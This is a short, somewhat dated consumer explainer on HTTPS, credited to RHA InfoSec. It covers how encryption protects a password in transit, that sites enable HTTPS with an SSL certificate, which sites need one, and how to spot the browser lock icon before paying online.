In a secure communication, i.e. HTTPS, the conversation between A and B takes place inside a protected tunnel. The information user A sends to B is encrypted, so even if a hacker gains unauthorized access to the conversation he receives only the encrypted password (“xz54p6kd“) and not the original one.
This scenario is illustrated using the following figure - 


Figure: Secure communication (HTTPS)




How is HTTPS implemented?


HTTPS is implemented using Secure Sockets Layer (SSL). A website can enable HTTPS by purchasing an SSL certificate.

Which websites need SSL Certificate?


Websites where private conversations take place, websites handling online transactions, and any site handling other sensitive information that needs protection need an SSL certificate.



How to identify a Secure Connection?


In Internet Explorer and Google Chrome you will see a lock icon in the security status bar, located on the right side of the address bar. You can click the lock to view the identity of the website.

If you are making an online transaction with a credit card or by any other means, you should check that https:// (secure communication) is enabled.

Source: RHA InfoSec